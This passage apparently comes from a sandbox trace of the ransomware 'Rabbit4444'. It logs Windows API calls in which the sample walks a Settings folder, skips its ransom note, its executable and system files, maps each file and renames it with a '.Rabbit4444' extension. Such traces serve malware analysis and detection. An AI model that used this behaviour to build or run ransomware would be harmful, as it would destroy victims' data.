"c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\namespace_classic_{60632754-c523-4b62-b45c-4172da012619}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2a0 [0060.639] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0060.639] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15194985344) returned 1 [0060.639] GetFileSizeEx (in: hFile=0x2a0, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1112) returned 1 [0060.639] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117c98 [0060.639] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1020c8 [0060.639] CreateFileMappingW (hFile=0x2a0, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x760, lpName=0x0) returned 0x29c [0060.640] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x760) returned 0x70000 [0060.643] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0060.643] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108df8 [0060.643] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0060.643] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109258 [0060.643] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0060.644] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109258 | out: hHeap=0xe0000) returned 1 [0060.644] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0060.644] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108df8 | out: hHeap=0xe0000) returned 1 [0060.644] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15195459522) returned 1 [0060.644] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117c98 | out: hHeap=0xe0000) returned 1 [0060.644] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1020c8 | out: hHeap=0xe0000) returned 1 [0060.644] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0060.644] CloseHandle (hObject=0x29c) returned 1 [0060.644] CloseHandle (hObject=0x2a0) returned 1 [0060.644] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\NameSpace_Classic_{60632754-c523-4b62-b45c-4172da012619}.settingcontent-ms.Rabbit4444") returned 202 [0060.644] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\NameSpace_Classic_{60632754-c523-4b62-b45c-4172da012619}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\namespace_classic_{60632754-c523-4b62-b45c-4172da012619}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\NameSpace_Classic_{60632754-c523-4b62-b45c-4172da012619}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\namespace_classic_{60632754-c523-4b62-b45c-4172da012619}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0060.645] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xebd715fa, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xebd715fa, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0xebea2874, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x44d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NameSpace_Classic_{6C8EEC18-8D75-41B2-A177-8831D59D2D50}.settingcontent-ms", cAlternateFileName="NAMESP~4.SET")) returned 1 [0060.645] lstrcmpiW (lpString1="NameSpace_Classic_{6C8EEC18-8D75-41B2-A177-8831D59D2D50}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0060.645] lstrcmpiW (lpString1="NameSpace_Classic_{6C8EEC18-8D75-41B2-A177-8831D59D2D50}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0060.645] lstrcmpiW (lpString1="NameSpace_Classic_{6C8EEC18-8D75-41B2-A177-8831D59D2D50}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0060.645] lstrcmpiW (lpString1="NameSpace_Classic_{6C8EEC18-8D75-41B2-A177-8831D59D2D50}.settingcontent-ms", lpString2=".") returned 1 [0060.645] lstrcmpiW (lpString1="NameSpace_Classic_{6C8EEC18-8D75-41B2-A177-8831D59D2D50}.settingcontent-ms", lpString2="..") returned 1 [0060.645] lstrcmpiW (lpString1="NameSpace_Classic_{6C8EEC18-8D75-41B2-A177-8831D59D2D50}.settingcontent-ms", lpString2="windows") returned -1 [0060.645] lstrcmpiW (lpString1="NameSpace_Classic_{6C8EEC18-8D75-41B2-A177-8831D59D2D50}.settingcontent-ms", lpString2="bootmgr") returned 1 [0060.645] lstrcmpiW (lpString1="NameSpace_Classic_{6C8EEC18-8D75-41B2-A177-8831D59D2D50}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0060.645] lstrcmpiW (lpString1="NameSpace_Classic_{6C8EEC18-8D75-41B2-A177-8831D59D2D50}.settingcontent-ms", lpString2="boot") returned 1 [0060.645] lstrcmpiW (lpString1="NameSpace_Classic_{6C8EEC18-8D75-41B2-A177-8831D59D2D50}.settingcontent-ms", lpString2="ids.txt") returned 1 [0060.645] lstrcmpiW (lpString1="NameSpace_Classic_{6C8EEC18-8D75-41B2-A177-8831D59D2D50}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0060.645] lstrcpyW (in: lpString1=0x130ec22, lpString2="NameSpace_Classic_{6C8EEC18-8D75-41B2-A177-8831D59D2D50}.settingcontent-ms" | out: lpString1="NameSpace_Classic_{6C8EEC18-8D75-41B2-A177-8831D59D2D50}.settingcontent-ms") returned="NameSpace_Classic_{6C8EEC18-8D75-41B2-A177-8831D59D2D50}.settingcontent-ms" [0060.645] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\NameSpace_Classic_{6C8EEC18-8D75-41B2-A177-8831D59D2D50}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0060.646] lstrlenW (lpString="NameSpace_Classic_{6C8EEC18-8D75-41B2-A177-8831D59D2D50}.settingcontent-ms") returned 74 [0060.646] lstrlenW (lpString="Rabbit4444") returned 10 [0060.646] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0060.646] lstrlenW (lpString=".dll") returned 4 [0060.646] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0060.646] lstrlenW (lpString=".lnk") returned 4 [0060.646] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0060.646] lstrlenW (lpString=".ini") returned 4 [0060.646] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0060.646] lstrlenW (lpString=".sys") returned 4 [0060.646] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0060.647] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\NameSpace_Classic_{6C8EEC18-8D75-41B2-A177-8831D59D2D50}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\namespace_classic_{6c8eec18-8d75-41b2-a177-8831d59d2d50}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2a0 [0060.647] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0060.647] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15195761224) returned 1 [0060.647] GetFileSizeEx (in: hFile=0x2a0, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1101) returned 1 [0060.647] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117860 [0060.647] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101848 [0060.647] CreateFileMappingW (hFile=0x2a0, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x750, lpName=0x0) returned 0x29c [0060.648] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x750) returned 0x70000 [0060.649] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0060.649] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109258 [0060.649] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0060.649] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0060.649] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0060.649] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0060.649] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0060.649] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109258 | out: hHeap=0xe0000) returned 1 [0060.649] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15196009598) returned 1 [0060.649] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117860 | out: hHeap=0xe0000) returned 1 [0060.649] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101848 | out: hHeap=0xe0000) returned 1 [0060.649] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0060.650] CloseHandle (hObject=0x29c) returned 1 [0060.650] CloseHandle (hObject=0x2a0) returned 1 [0060.650] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\NameSpace_Classic_{6C8EEC18-8D75-41B2-A177-8831D59D2D50}.settingcontent-ms.Rabbit4444") returned 202 [0060.650] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\NameSpace_Classic_{6C8EEC18-8D75-41B2-A177-8831D59D2D50}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\namespace_classic_{6c8eec18-8d75-41b2-a177-8831d59d2d50}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\NameSpace_Classic_{6C8EEC18-8D75-41B2-A177-8831D59D2D50}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\namespace_classic_{6c8eec18-8d75-41b2-a177-8831d59d2d50}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0060.650] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec6d4a7c, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xec6d4a7c, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0xec76d3b3, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x464, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NameSpace_Classic_{7b81be6a-ce2b-4676-a29e-eb907a5126c5}.settingcontent-ms", cAlternateFileName="NA4AB1~1.SET")) returned 1 [0060.651] lstrcmpiW (lpString1="NameSpace_Classic_{7b81be6a-ce2b-4676-a29e-eb907a5126c5}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0060.651] lstrcmpiW (lpString1="NameSpace_Classic_{7b81be6a-ce2b-4676-a29e-eb907a5126c5}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0060.651] lstrcmpiW (lpString1="NameSpace_Classic_{7b81be6a-ce2b-4676-a29e-eb907a5126c5}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0060.651] lstrcmpiW (lpString1="NameSpace_Classic_{7b81be6a-ce2b-4676-a29e-eb907a5126c5}.settingcontent-ms", lpString2=".") returned 1 [0060.651] lstrcmpiW (lpString1="NameSpace_Classic_{7b81be6a-ce2b-4676-a29e-eb907a5126c5}.settingcontent-ms", lpString2="..") returned 1 [0060.651] lstrcmpiW (lpString1="NameSpace_Classic_{7b81be6a-ce2b-4676-a29e-eb907a5126c5}.settingcontent-ms", lpString2="windows") returned -1 [0060.651] lstrcmpiW (lpString1="NameSpace_Classic_{7b81be6a-ce2b-4676-a29e-eb907a5126c5}.settingcontent-ms", lpString2="bootmgr") returned 1 [0060.651] lstrcmpiW (lpString1="NameSpace_Classic_{7b81be6a-ce2b-4676-a29e-eb907a5126c5}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0060.651] lstrcmpiW (lpString1="NameSpace_Classic_{7b81be6a-ce2b-4676-a29e-eb907a5126c5}.settingcontent-ms", lpString2="boot") returned 1 [0060.651] lstrcmpiW (lpString1="NameSpace_Classic_{7b81be6a-ce2b-4676-a29e-eb907a5126c5}.settingcontent-ms", lpString2="ids.txt") returned 1 [0060.651] lstrcmpiW (lpString1="NameSpace_Classic_{7b81be6a-ce2b-4676-a29e-eb907a5126c5}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0060.651] lstrcpyW (in: lpString1=0x130ec22, lpString2="NameSpace_Classic_{7b81be6a-ce2b-4676-a29e-eb907a5126c5}.settingcontent-ms" | out: lpString1="NameSpace_Classic_{7b81be6a-ce2b-4676-a29e-eb907a5126c5}.settingcontent-ms") returned="NameSpace_Classic_{7b81be6a-ce2b-4676-a29e-eb907a5126c5}.settingcontent-ms" [0060.651] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\NameSpace_Classic_{7b81be6a-ce2b-4676-a29e-eb907a5126c5}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0060.651] lstrlenW (lpString="NameSpace_Classic_{7b81be6a-ce2b-4676-a29e-eb907a5126c5}.settingcontent-ms") returned 74 [0060.651] lstrlenW (lpString="Rabbit4444") returned 10 [0060.651] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0060.652] lstrlenW (lpString=".dll") returned 4 [0060.652] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0060.652] lstrlenW (lpString=".lnk") returned 4 [0060.652] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0060.652] lstrlenW (lpString=".ini") returned 4 [0060.652] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0060.652] lstrlenW (lpString=".sys") returned 4 [0060.652] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0060.652] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\NameSpace_Classic_{7b81be6a-ce2b-4676-a29e-eb907a5126c5}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\namespace_classic_{7b81be6a-ce2b-4676-a29e-eb907a5126c5}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2a0 [0060.652] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0060.652] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15196287295) returned 1 [0060.652] GetFileSizeEx (in: hFile=0x2a0, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1124) returned 1 [0060.652] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117a40 [0060.652] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101c00 [0060.652] CreateFileMappingW (hFile=0x2a0, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x770, lpName=0x0) returned 0x29c [0060.653] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x770) returned 0x70000 [0060.654] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0060.654] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109140 [0060.654] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0060.654] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0060.654] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0060.654] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0060.654] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0060.654] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109140 | out: hHeap=0xe0000) returned 1 [0060.655] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15196527125) returned 1 [0060.655] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117a40 | out: hHeap=0xe0000) returned 1 [0060.655] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101c00 | out: hHeap=0xe0000) returned 1 [0060.655] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0060.655] CloseHandle (hObject=0x29c) returned 1 [0060.655] CloseHandle (hObject=0x2a0) returned 1 [0060.655] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\NameSpace_Classic_{7b81be6a-ce2b-4676-a29e-eb907a5126c5}.settingcontent-ms.Rabbit4444") returned 202 [0060.655] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\NameSpace_Classic_{7b81be6a-ce2b-4676-a29e-eb907a5126c5}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\namespace_classic_{7b81be6a-ce2b-4676-a29e-eb907a5126c5}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\NameSpace_Classic_{7b81be6a-ce2b-4676-a29e-eb907a5126c5}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\namespace_classic_{7b81be6a-ce2b-4676-a29e-eb907a5126c5}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0060.656] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xed417b92, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xed417b92, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0xed4b0574, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x45a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NameSpace_Classic_{B98A2BEA-7D42-4558-8BD1-832F41BAC6FD}.settingcontent-ms", cAlternateFileName="NAF0E5~1.SET")) returned 1 [0060.656] lstrcmpiW (lpString1="NameSpace_Classic_{B98A2BEA-7D42-4558-8BD1-832F41BAC6FD}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0060.656] lstrcmpiW (lpString1="NameSpace_Classic_{B98A2BEA-7D42-4558-8BD1-832F41BAC6FD}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0060.656] lstrcmpiW (lpString1="NameSpace_Classic_{B98A2BEA-7D42-4558-8BD1-832F41BAC6FD}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0060.656] lstrcmpiW (lpString1="NameSpace_Classic_{B98A2BEA-7D42-4558-8BD1-832F41BAC6FD}.settingcontent-ms", lpString2=".") returned 1 [0060.656] lstrcmpiW (lpString1="NameSpace_Classic_{B98A2BEA-7D42-4558-8BD1-832F41BAC6FD}.settingcontent-ms", lpString2="..") returned 1 [0060.656] lstrcmpiW (lpString1="NameSpace_Classic_{B98A2BEA-7D42-4558-8BD1-832F41BAC6FD}.settingcontent-ms", lpString2="windows") returned -1 [0060.656] lstrcmpiW (lpString1="NameSpace_Classic_{B98A2BEA-7D42-4558-8BD1-832F41BAC6FD}.settingcontent-ms", lpString2="bootmgr") returned 1 [0060.656] lstrcmpiW (lpString1="NameSpace_Classic_{B98A2BEA-7D42-4558-8BD1-832F41BAC6FD}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0060.656] lstrcmpiW (lpString1="NameSpace_Classic_{B98A2BEA-7D42-4558-8BD1-832F41BAC6FD}.settingcontent-ms", lpString2="boot") returned 1 [0060.656] lstrcmpiW (lpString1="NameSpace_Classic_{B98A2BEA-7D42-4558-8BD1-832F41BAC6FD}.settingcontent-ms", lpString2="ids.txt") returned 1 [0060.656] lstrcmpiW (lpString1="NameSpace_Classic_{B98A2BEA-7D42-4558-8BD1-832F41BAC6FD}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0060.656] lstrcpyW (in: lpString1=0x130ec22, lpString2="NameSpace_Classic_{B98A2BEA-7D42-4558-8BD1-832F41BAC6FD}.settingcontent-ms" | out: lpString1="NameSpace_Classic_{B98A2BEA-7D42-4558-8BD1-832F41BAC6FD}.settingcontent-ms") returned="NameSpace_Classic_{B98A2BEA-7D42-4558-8BD1-832F41BAC6FD}.settingcontent-ms" [0060.656] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\NameSpace_Classic_{B98A2BEA-7D42-4558-8BD1-832F41BAC6FD}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0060.656] lstrlenW (lpString="NameSpace_Classic_{B98A2BEA-7D42-4558-8BD1-832F41BAC6FD}.settingcontent-ms") returned 74 [0060.656] lstrlenW (lpString="Rabbit4444") returned 10 [0060.656] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0060.656] lstrlenW (lpString=".dll") returned 4 [0060.656] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0060.656] lstrlenW (lpString=".lnk") returned 4 [0060.656] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0060.656] lstrlenW (lpString=".ini") returned 4 [0060.656] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0060.656] lstrlenW (lpString=".sys") returned 4 [0060.657] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0060.657] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\NameSpace_Classic_{B98A2BEA-7D42-4558-8BD1-832F41BAC6FD}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\namespace_classic_{b98a2bea-7d42-4558-8bd1-832f41bac6fd}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2a0 [0060.657] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0060.657] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15196766298) returned 1 [0060.657] GetFileSizeEx (in: hFile=0x2a0, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1114) returned 1 [0060.657] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117c98 [0060.657] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1016b0 [0060.657] CreateFileMappingW (hFile=0x2a0, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x760, lpName=0x0) returned 0x29c [0060.660] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x760) returned 0x70000 [0060.661] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0060.661] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108df8 [0060.661] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0060.661] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109028 [0060.661] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0060.662] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109028 | out: hHeap=0xe0000) returned 1 [0060.662] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0060.662] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108df8 | out: hHeap=0xe0000) returned 1 [0060.662] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15197250460) returned 1 [0060.662] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117c98 | out: hHeap=0xe0000) returned 1 [0060.662] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1016b0 | out: hHeap=0xe0000) returned 1 [0060.662] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0060.662] CloseHandle (hObject=0x29c) returned 1 [0060.662] CloseHandle (hObject=0x2a0) returned 1 [0060.662] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: 